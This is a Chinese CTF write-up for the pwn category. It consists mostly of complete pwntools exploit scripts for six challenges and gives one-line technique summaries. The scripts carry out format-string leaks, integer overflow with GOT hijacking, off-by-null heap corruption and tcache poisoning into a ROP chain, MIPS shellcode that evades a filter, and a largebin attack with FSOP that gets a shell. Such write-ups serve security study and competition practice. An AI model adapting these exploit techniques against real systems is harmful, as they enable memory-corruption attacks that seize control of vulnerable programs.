AK了PWN,但其他方向基本爆0(

PWN

p2048

2048打完就通。程序的随机数种子是固定的,所以每次出现的数字和位置都一样,直接回放一段预先录好的按键序列即可,不需要在线求解。

from pwn import *
io = remote('39.106.48.123', 32818)
# Replay a pre-recorded w/a/s/d move sequence. The challenge's PRNG is seeded
# with a fixed value, so tile spawns are deterministic and this exact string
# wins every time. It was recorded against this build only: a binary with a
# different seed (or a different PRNG) needs a fresh recording.
# NOTE(review): send() of a str is Python 2 style; pwntools on Python 3
# re-encodes it with a warning.
io.send('awddadwwdwdwdwwadwdwadwwdwdwwdwwwaddwdwdawdwwawdawdddddddwddwdadwwwwwdadwdwawdwdwadadwdddwawdwawdwdwdwddwdwadwdwwdwwdwdwwwddadwdawawdadwwdwdwddwwddwadwaddwawwddawdwwdwdwdwddwaddwadwdwdwwawwdwwdwawdwdwadwwwwwdwwdwwadwwawwdwwaddwdddadwdddwddwddwadaswdwdwwdawdwadwddwwdwwwawdwddwawdwdwdwdwddwwdawdwdwawdwawwdwdawdwddwdwadwdwawddawwdwwdwwddwddadwwwdwwwwwdwdadwddwwdadwddwwwdadwdwadaawwdwadwawdddwwddadddwdwddwdddadwdwddwadwwwawdawdwdwwdwdwdddwdwwdadwdddadwdddwwwdadwdwadwddawdwwadwawwdddddawddwdwdwdadwdwawddwaddwwdawawdwwadwdwdwdwdwadwdwwdwawdawdwdwawdwddwwdwadwawdwddwwdadwdddwwdwddddwaddwdwdwdawdddwwawwdwawdwwddwdadwadwdwwdadwdwaddwwwadwawddddawdwwdwdawwwdwwaswawdwddawwdwdddawdddawdwwwddwwdwdawdwdddadwdwawdwwdwadaddaddwdaddwddawdawdwawdwwddwawdwdwwddwdwdwwawdwwwdawdwdddawdwddwawwdadwwddadwdwddawdwddwddwawdwwdadadwwdwwadawdwdwwdadwawdddwdwdawddddddwdaawdadwdwddddadawawawddawdwdawdwawdwdwdwdwadwdwddawwddwaddawdwawwddwwdadadwdawadwawdwddawdwwawwdwwdddwadwaawawdwwdwadawwawwddwdwdadwdaawawdddddswdwdd')
# Drop into an interactive shell on the (presumably) spawned shell.
io.interactive()

easy_LzhiFTP_CHELL

格串泄露程序基址,整数溢出,got表劫持

from pwn import *

io = remote('39.106.65.110', 31163)
context.binary = 'easy_LzhiFTP'


def ru(delim):
    """Receive until *delim* and return the data with the delimiter dropped."""
    return io.recvuntil(delim, drop=True)


def sa(prompt, data):
    """Send *data* (no trailing newline) once *prompt* has been received."""
    return io.sendafter(prompt, data)


def sla(prompt, data):
    """Send *data* plus a newline once *prompt* has been received."""
    return io.sendlineafter(prompt, data)


def ia():
    """Hand the connection over to the user."""
    return io.interactive()


def pie_os(offset):
    """Rebase a binary-relative *offset* on the leaked ``pie_base``.

    ``pie_base`` is a module global assigned after the format-string leak
    below; calling this earlier raises NameError.
    """
    return pie_base + offset

def cmd(x):
    """Send one FTP-style command *x* at the ``IMLZH1-FTP> `` prompt."""
    io.sendlineafter('IMLZH1-FTP> ', x)

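# --- login ---------------------------------------------------------------
sa('Username: ', '133')
# The password is packed as an 8-byte integer; 0xa00000072 has a low 32-bit
# half of 0x72, which is presumably what the integer-overflow check compares
# against -- confirm in the binary.
sa('Input Password: ', flat(0xa00000072))
# Format-string leak: %6$p prints the 6th vararg slot, which holds a pointer
# into the binary itself.
sa('(yes/No)', 'No%6$p\n')
ru('No')
# 0x2096 is the distance between that pointer and the PIE base, taken from a
# debugging session (0x55eebea27096 - 0x55eebea25000); valid for this build only.
pie_base = int(ru('\n'), 16) - (0x55eebea27096 - 0x55eebea25000)
strcspn_got = pie_os(0x0000000000004060)

# --- plant a file entry whose name field is the strcspn GOT slot -----------
pld = flat([
    'toucha',
    strcspn_got,
    0,
])
# Negative index into the file table (target 0x4a80 lies before the table at
# 0x4b00). Floor division keeps this an int on Python 3 -- with '/' the
# value becomes -16.0 and str() would send "-16.0" to the program.
idx = (0x0000000000004A80 - 0x0000000000004B00) // 8
cmd(pld)
sla('Context:', 'a')

# --- GOT hijack -----------------------------------------------------------
# Overwrite strcspn@got with the address 0x11c0 inside the binary (the
# function the write-up replaces it with -- verify which one in IDA), then
# make the program call strcspn() on '/bin/sh'.
cmd('edit')
sa('idx:\n', str(idx))
sa('Content: ', flat(pie_os(0x00000000000011C0)))
cmd('/bin/sh\x00')
ia()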

babyaul

ida里把这一段nop掉会发现有个off by null

off by null → fake unsortedbin chunk → chunk overlapping → hijack tcache fd pointer → leak stack (via environ) → hijack tcache fd pointer → hijack retaddr → orw rop

from pwn import *
from ctypes import *

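io = remote('39.106.65.110', 14188)
context.binary = './babyaul'

elf = ELF('./babyaul', checksec = False)
libc = ELF('libc-2.31.so', checksec = False)
# The same libc the remote runs, loaded as a C library so that srand()/rand()
# reproduce the remote's password sequence exactly.
dll = cdll.LoadLibrary('libc-2.31.so')


def rc(n):
    """Read exactly *n* bytes from the connection."""
    return io.recv(n)


def ru(delim):
    """Receive until *delim*, dropping the delimiter itself."""
    return io.recvuntil(delim, drop=True)


def sd(data):
    """Send *data* raw, without a trailing newline."""
    return io.send(data)


def sla(prompt, data):
    """Send *data* plus a newline once *prompt* has been received."""
    return io.sendlineafter(prompt, data)


def ia():
    """Hand the connection over to the user."""
    return io.interactive()


def uu64(leak):
    """Unpack a <=8-byte little-endian leak, zero-padding on the right.

    The pad is a bytes literal: on Python 3 pwntools returns bytes, and
    bytes.ljust() raises TypeError for a str fill character.
    """
    return u64(leak.ljust(8, b'\x00'))


def libc_os(offset):
    """Rebase a libc-relative *offset* on the leaked ``libc_base``."""
    return libc_base + offset


def heap_os(offset):
    """Rebase a heap-relative *offset* on the leaked ``heap_base``."""
    return heap_base + offset


def libc_sym(name):
    """Absolute address of libc symbol *name* in the remote process."""
    return libc_os(libc.sym[name])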

def cmd(x):
    """Pick menu entry *x* at the ``>`` prompt."""
    io.sendlineafter('>', x)

def add(size, mode, content):
    """Allocate a chunk of *size* bytes in *mode* and fill it with *content*.

    The content is sent raw (no newline) because the program reads it with a
    fixed-length read; a trailing newline would end up in the chunk.
    """
    cmd('add')
    io.sendlineafter('size?', str(size))
    io.sendlineafter('mode?', str(mode))
    io.send(content)

def delete(idx):
    """Free the chunk in slot *idx* (the pointer is not cleared by the program)."""
    cmd('del')
    io.sendlineafter('index?', str(idx))

def show(idx):
    """Print the contents of slot *idx*; the caller parses the reply."""
    cmd('get')
    io.sendlineafter('index?\n', str(idx))

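# --- password gate ---------------------------------------------------------
cmd('pass')
# Mirror the server's srand(time(0)). This races on a second boundary, so
# rerun the script if the password is rejected; it also relies on the local
# libc-2.31 rand() matching the remote's generator.
dll.srand(dll.time(0))
ans = bytearray(dll.rand() % 43 + 48 for _ in range(4))
# bytes(ans), not str(ans): on Python 3 str() of a bytearray is the repr
# "bytearray(b'...')", which is not the password.
sla('pass:', bytes(ans))

# --- libc leak through a stale unsorted-bin fd pointer ---------------------
add(0x500, 3, 'junk') #0
add(0x500, 3, 'junk') #1
add(0x500, 3, 'junk') #2
# Size field planted at +0x98 of chunk 3; reused when chunk 3 is re-created
# with a forged header further down.
pld = flat({
    0x98: 0xb91 + 2 * 0x110
})
add(0x500, 3, pld) #3
delete(0)
# Re-allocating writes a single 'a' (0x61) over the low byte of the stale fd
# pointer, which is why the debug-session leak ended in ...b61. The
# subtraction is (leak - libc base) from that session and is build-specific.
add(0x500, 3, 'a') #0
show(0)
libc_base = uu64(rc(6)) - (0x7f2c510a4b61 - 0x7f2c50eb8000)
environ = libc_sym('environ')

# --- heap leak -------------------------------------------------------------
delete(0)
delete(2)
add(0x500, 3, 'a' * 8) #0
show(0)
ru('a' * 8)
heap_base = uu64(rc(6)) - (0x558eab44cc50 - 0x558eab441000)

# --- grooming: 0x110 tcache-sized chunks between large chunks ---------------
add(0x500, 3, 'a' * 8) #2
add(0x100, 2, 'a' * 8) #4
add(0x100, 2, 'a' * 8) #5
add(0x100, 2, 'a' * 8) #6
add(0x100, 2, 'a' * 8) #7
add(0x100, 2, 'a' * 8) #8
add(0x4f0, 3, 'a' * 8) #9
add(0x4f0, 3, 'a' * 8) #10
add(0x4f0, 3, 'a' * 8) #11
delete(9)
# Off-by-null: a 0x4f8 request places a fake prev_size at +0x4f0 and the
# terminating null byte clears PREV_INUSE of the next chunk, so freeing it
# consolidates backwards into the forged chunk below (see write-up above).
pld = flat({
    0x4f0: 0xb90 + 2 * 0x110
})
add(0x4f8, 3, pld) #9
delete(3)
# Forged free chunk (size 0x501) whose fd/bk are debug-session heap addresses
# rebased on heap_base; presumably they point back at the forged chunk so the
# unlink fd->bk == bk->fd check passes -- confirm against the heap layout.
pld = flat({
    8: 0x501,
    0x10: heap_os(0x557bbfbd9200 - 0x557bbfbcd000),
    0x18: heap_os(0x557bbfbd9200 - 0x557bbfbcd000),
    0x98: 0xb91 + 2 * 0x110,
    0xa0: heap_os(0x557bbfbd9170 - 0x557bbfbcd000),
    0xa8: heap_os(0x557bbfbd9170 - 0x557bbfbcd000)
})
add(0x500, 3, pld) #3
delete(10)
delete(6)
delete(5)
# The new 0x500 chunk overlaps the freed 0x110 chunks; +0x470 is the tcache
# fd of the most recently freed one, redirected at environ-0x10 so the next
# two 0x100 allocations hand back a chunk inside libc.
add(0x500, 3, flat({0x470: environ - 0x10})) #5
add(0x100, 2, 'a') #6
add(0x100, 2, 'a' * 0x10) #10
show(10)
ru('a' * 0x10)
# environ holds a stack pointer; the return address being targeted sits
# 0x3f0 bytes below it (session-measured, frame-layout specific).
ret_addr = uu64(rc(6)) - (0x7fff4817b6f8 - 0x7fff4817b308)

# --- second tcache poison: point a 0x110 chunk at the return address -------
delete(8)
delete(7)
add(0x500, 3, flat({0x180: ret_addr})) #7
add(0x100, 2, 'flag\x00') #8
flag_str_addr = heap_os(0x5578779648a0 - 0x557877958000)
open_addr = libc_sym('open')
read_addr = libc_sym('read')
write_addr = libc_sym('write')
# Gadget offsets are for this libc-2.31 build only.
pop_rdi = libc_os(0x0000000000023b72)
pop_rsi = libc_os(0x000000000002604f)
pop_rdx_r12 = libc_os(0x0000000000119241)
# open("flag", 0); read(3, heap+0x200, 0x30); write(1, heap+0x200, <rdx>).
# Assumes open() returns fd 3 (no other files open), the flag fits in 0x30
# bytes, and rdx still holds 0x30 when write() runs.
rop_chain = flat([
    pop_rdi,
    flag_str_addr,
    pop_rsi,
    0,
    open_addr,
    pop_rdi,
    3,
    pop_rsi,
    heap_base + 0x200,
    pop_rdx_r12,
    0x30,
    0,
    read_addr,
    pop_rdi,
    1,
    write_addr
])
# Mode 1 presumably returns the poisoned chunk, so this write lands on the
# saved return address and the chain runs on the next return.
add(0x100, 1, rop_chain)
ia()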

sigin_shellcode

随机数预测,mips shellcode,addiu指令机器码0截断绕过shellcode白名单检测

from pwn import *
from ctypes import *

io = process('./sc')
context.binary = 'sc'
# Host glibc, used for srand()/rand(); the challenge seeds with a constant so
# any libc whose rand() matches the target's generator reproduces the values.
dll = cdll.LoadLibrary('/lib/x86_64-linux-gnu/libc.so.6')


def sa(prompt, data):
    """Send *data* (no trailing newline) once *prompt* has been received."""
    return io.sendafter(prompt, data)


def sla(prompt, data):
    """Send *data* plus a newline once *prompt* has been received."""
    return io.sendlineafter(prompt, data)


def ia():
    """Hand the process over to the user."""
    return io.interactive()


def dbg(gdbscript=None):
    """Attach gdb to the target, optionally running *gdbscript* first."""
    return gdb.attach(io, gdbscript)

def menu(choice):
    """Select main-menu entry *choice* at the ``Go>`` prompt."""
    io.sendlineafter('Go> \n', str(choice))

def down():
    """Descend one floor, answering the price prompt with the predicted value.

    The script reseeds with the constant 0x1BF52 before every roll
    (presumably mirroring what the binary does), so rand() always yields the
    same first value; the expected answer is that value reduced mod 114514
    and then mod (current floor + 1). ``Floor_num`` is advanced afterwards.
    """
    global Floor_num
    menu(1)
    dll.srand(0x1BF52)
    predicted = dll.rand() % 114514 % (Floor_num + 1)
    sla('How much do you want?\n', str(predicted))
    Floor_num += 1

def shopping(choice):
    """Open the shop (menu 3) and buy item *choice*."""
    menu(3)
    io.sendlineafter('> \n', str(choice))

Floor_num = 0
# Walk 99 floors down with predicted prices, buy items 2 and 3, then take
# one more floor to reach the shellcode prompt (sequence from the write-up).
for _ in range(99):
    down()
shopping(2)
shopping(3)
down()
# MIPS o32 execve (syscall 4011) with a1 = a2 = 0. a0 is not set here, so it
# must already hold the "/bin/sh" pointer when the shellcode runs -- confirm
# in the binary. The addiu encodings contain zero bytes, which end the
# whitelist's string scan early (see note above); the operand on `syscall`
# is the ignored code field, chosen so the encoded bytes pass the filter.
sc = asm('''
addiu $a1,$zero,0
addiu $a2,$zero,0
addiu $v0,$zero,4011
syscall 0x40404
''')
sa('Shellcode > \n', sc)
ia()

边上课边打的三血

babygame

随机数预测,bss段溢出,指针变量覆写,bss段格串,got表劫持

from pwn import *
from ctypes import *
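io = remote('47.93.6.210', 36357)
context.binary = 'pwn'

elf = ELF('pwn', checksec = False)
# Symbol offsets (atoi, system) come from the host libc; this only works if
# the remote runs the same build.
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6', checksec = False)
# Same library loaded for srand()/rand()/time() to replay the game's PRNG.
dll = cdll.LoadLibrary('/lib/x86_64-linux-gnu/libc.so.6')


def rc(n):
    """Read exactly *n* bytes from the connection."""
    return io.recv(n)


def ru(delim):
    """Receive until *delim*, dropping the delimiter itself."""
    return io.recvuntil(delim, drop=True)


def sa(prompt, data):
    """Send *data* (no trailing newline) once *prompt* has been received."""
    return io.sendafter(prompt, data)


def sla(prompt, data):
    """Send *data* plus a newline once *prompt* has been received."""
    return io.sendlineafter(prompt, data)


def ia():
    """Hand the connection over to the user."""
    return io.interactive()


def uu64(leak):
    """Unpack a <=8-byte little-endian leak, zero-padding on the right.

    The pad is a bytes literal: on Python 3 pwntools returns bytes, and
    bytes.ljust() raises TypeError for a str fill character.
    """
    return u64(leak.ljust(8, b'\x00'))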

def menu(choice):
    """Select main-menu entry *choice* at the ``>> `` prompt."""
    io.sendlineafter('>> ', str(choice))

def play(level):
    """Start a game at *level* and answer its 20 guessing rounds.

    Every round reseeds with the current epoch second and draws four letters
    from the first 26 entries of the alphabet string, presumably the same
    way the binary does; a fifth 'a' is appended to match the expected
    answer length -- confirm against the binary. Answers are sent without a
    newline.
    """
    menu(1)
    sa('Please enter your level : ', str(level))
    alphabet = 'abcdefghijklmnopqrstuvwxyzA'
    for _ in range(20):
        dll.srand(dll.time(0))
        guess = ''.join(alphabet[dll.rand() % 26] for _ in range(4)) + 'a'
        sa('Give me : ', guess)

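ATOI_GOT = 0x0000000000602078
# bss pointer the print path dereferences (offset 0x100 into the overflowed
# buffer); used as the target of the %28$ln writes -- verify in the binary.
PTR_SLOT = 0x0000000000602120


def _fmt_write(value, pos, spec):
    """Build a printf payload that writes *value* through ``%<pos>$<spec>``.

    A zero value must not emit ``%0c``: printf reads that '0' as a flag and
    still prints one character, so the write would store 1 instead of 0.
    The padding is simply omitted in that case.
    """
    pad = '%' + str(value) + 'c' if value else ''
    return pad + '%' + str(pos) + '$' + spec


def _purchase(pld):
    """One buy/print round with *pld* as the purchased 'letter' buffer.

    The buffer is on bss and the program does not bound the copy, so bytes
    past 0x100 overwrite the pointer that menu 4 later prints through; the
    start of the buffer is also used as a format string by that print.
    """
    menu(2)
    menu(1)
    sa('Enter the letter you want to purchase\n', pld)
    menu(2)
    menu(4)


play(4)
sa('Give me : ', 'a')
menu(2)
menu(2)
sa('What size do you need : \n', '280')

# Round 1: point the bss pointer at atoi@got and print it -> libc leak.
_purchase(flat({0x100: ATOI_GOT}, filler='\x00'))
ru('4')
libc_base = uu64(rc(6)) - libc.sym['atoi']
sys_addr = libc_base + libc.sym['system']

# Rounds 2-5: stack slot 28 points into PTR_SLOT's target; writing the GOT
# address there turns slot 41 into a pointer to atoi@got, which then receives
# system's low 16 bits; repeat for the next two bytes. The upper bytes are
# shared with atoi since both live in the same libc mapping.
_purchase(flat({
    0: _fmt_write(ATOI_GOT, 28, 'ln'),
    0x100: PTR_SLOT
}, filler='\x00'))
_purchase(flat({
    0: _fmt_write(sys_addr & 0xffff, 41, 'hn'),
}, filler='\x00'))
_purchase(flat({
    0: _fmt_write(ATOI_GOT + 2, 28, 'ln'),
    0x100: PTR_SLOT
}, filler='\x00'))
_purchase(flat({
    0: _fmt_write((sys_addr >> 16) & 0xffff, 41, 'hn'),
}, filler='\x00'))

# atoi@got now points at system: the size prompt calls atoi("sh").
menu(2)
menu(2)
sa('What size do you need : \n', 'sh\x00')
ia()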

上课偷摸的三血

three-body

UAF,先申请一个大小能覆盖多个chunk的chunk,将其释放再分开来申请,然后写的时候就能一次性同时控制这几个chunk的内容

largebin attack → hijack IO_list_all → fsop

from pwn import *
from ctypes import *

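io = remote('39.106.48.123', 27653)
context.binary = 'pwn'

elf = ELF('pwn', checksec = False)
libc = ELF('libc-2.35.so', checksec = False)
# The target libc loaded as a C library so rand() replays the remote's
# "continue?" rolls after seeding with the value the ./get helper prints.
dll = cdll.LoadLibrary('./libc-2.35.so')


def rc(n):
    """Read exactly *n* bytes from the connection."""
    return io.recv(n)


def ru(delim):
    """Receive until *delim*, dropping the delimiter itself."""
    return io.recvuntil(delim, drop=True)


def sla(prompt, data):
    """Send *data* plus a newline once *prompt* has been received."""
    return io.sendlineafter(prompt, data)


def ia():
    """Hand the connection over to the user."""
    return io.interactive()


def uu64(leak):
    """Unpack a <=8-byte little-endian leak, zero-padding on the right.

    The pad is a bytes literal: on Python 3 pwntools returns bytes, and
    bytes.ljust() raises TypeError for a str fill character.
    """
    return u64(leak.ljust(8, b'\x00'))


def libc_os(offset):
    """Rebase a libc-relative *offset* on the leaked ``libc_base``."""
    return libc_base + offset


def heap_os(offset):
    """Rebase a heap-relative *offset* on the leaked ``heap_base``."""
    return heap_base + offset


def libc_sym(name):
    """Absolute address of libc symbol *name* in the remote process."""
    return libc_os(libc.sym[name])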

def menu(choice):
    """Select main-menu entry *choice* at the ``Your choice: `` prompt."""
    io.sendlineafter('Your choice: ', str(choice))

def add(idx, size):
    """Allocate slot *idx* with *size* bytes, replaying the random prompt.

    After each request the program rolls rand() % 10 (reproduced locally
    because ``dll`` was seeded identically). A roll of 5..9 is answered
    '1' and the request is repeated; anything else is answered '0' and the
    call returns. Inferred from the exploit's structure -- confirm in the
    binary.
    """
    while True:
        menu(1)
        sla('Select an area to explore: ', str(idx))
        sla('Enter the size of the range you want to explore this time: ', str(size))
        retry = (dll.rand() % 10) > 4
        sla('Your decision: (1: yes / 0: no)', '1' if retry else '0')
        if not retry:
            return

def delete(idx):
    """Free slot *idx*; the program keeps the dangling pointer (UAF)."""
    menu(2)
    io.sendlineafter('Select an area you want to abandon to return: ', str(idx))

def edit(idx, size, content):
    """Write *content* into slot *idx*, declaring *size* bytes to the program.

    Works on freed slots too, which is what the UAF-based overlap relies on.
    """
    menu(3)
    io.sendlineafter('Please select which area to talk to: ', str(idx))
    io.sendlineafter('Since remote calls are costly, enter the specific number of words you want to send: ', str(size))
    io.sendlineafter('Please write down your conclusions: ', content)

def show(idx):
    """Print slot *idx* (also on freed slots -- the leak primitive)."""
    menu(4)
    io.sendlineafter('Select to enter an area to receive a signal from the Trisolarans: ', str(idx))

# Helper binary that prints the seed the server uses for srand() (presumably
# derived the same way the challenge derives it); only its first line is read.
get = process('./get')
srand_arg = int(get.recvuntil('\n'))
get.close()
dll.srand(srand_arg)
# Four large chunks; freeing the non-adjacent 0 and 2 leaves both in the
# unsorted bin, and the UAF read on slot 0 returns its fd (libc) and bk
# (heap) pointers back to back.
add(0, 0x500)
add(1, 0x500)
add(2, 0x500)
add(3, 0x500)
delete(0)
delete(2)
show(0)
ru('The information that the Trisolarans have to tell you is as follows:\n')
# Offsets are (leak - base) pairs from a debugging session and only hold for
# this libc-2.35 build / heap layout.
libc_base = uu64(rc(8)) - (0x7f1f6e14dce0 - 0x7f1f6df34000)
sys_addr = libc_sym('system')
heap_base = uu64(rc(8)) - (0x55ee29498cb0 - 0x55ee29498000)
# Slot 6 is a 0x1000 chunk that is freed and then carved into 7/8/9/10; the
# dangling pointer in slot 6 still spans all of them, so one edit(6, ...)
# rewrites several live chunks at once (the trick described above).
add(4, 0x500)
add(5, 0x500)
add(6, 0x1000)
add(7, 0x500)
delete(6)
add(7, 0x510)
add(8, 0x5d0)
add(9, 0x500)
add(10, 0x500)
delete(7)
fake_file_addr = heap_os(0x55d67786d1d0 - 0x55d67786b000)
# Payload written through slot 6. The first four words are the freed chunk
# 7's fd/bk/fd_nextsize/bk_nextsize: the libc offset appears to be a bin
# head inside main_arena, and bk_nextsize = _IO_list_all - 0x20, i.e. the
# large-bin attack target. At +0xaf0 sits a fake FILE (flags " sh;") whose
# layout matches the House-of-Apple2 style chain: _wide_data (+0xa0) points
# at fake_file+0x100, that block's _wide_vtable (+0xe0) points back at the
# fake FILE, and +0x68 (doallocate slot of that fake vtable) holds system;
# +0xd8 looks like _IO_wfile_jumps for this build. NOTE(review): inferred
# from the offsets -- confirm each field against the libc-2.35 structs.
pld = flat({
0: [
libc_os(0x7f539fab6110 - 0x7f539f89c000),
libc_os(0x7f539fab6110 - 0x7f539f89c000),
heap_os(0x55b75b89c6d0 - 0x55b75b89b000),
libc_os(0x7f7eb3332680 - 0x7f7eb3118000 - 0x20)
],
0xaf0: {
0: [
' sh;\x00\x00\x00',
0x511
],
0x68: sys_addr,
0x88: heap_base + 0x100,
0xa0: fake_file_addr + 0x100,
0xd8: libc_os(0x7f30b82ca0c0 - 0x7f30b80b4000),
0x100: {
0x18: 0,
0x30: 0,
0xe0: fake_file_addr
}
}
}, filler = '\x00')
# Put chunk 7 into the large bin, then trigger the attack: freeing 9 and
# requesting a larger chunk sorts it past 7, writing 9's address into
# _IO_list_all. Menu 5 presumably exits, so exit's flush walks the fake
# FILE and reaches system(" sh;...").
add(11, 0x600)
edit(6, len(pld), pld)
delete(9)
add(12, 0x1000)
menu(5)
ia()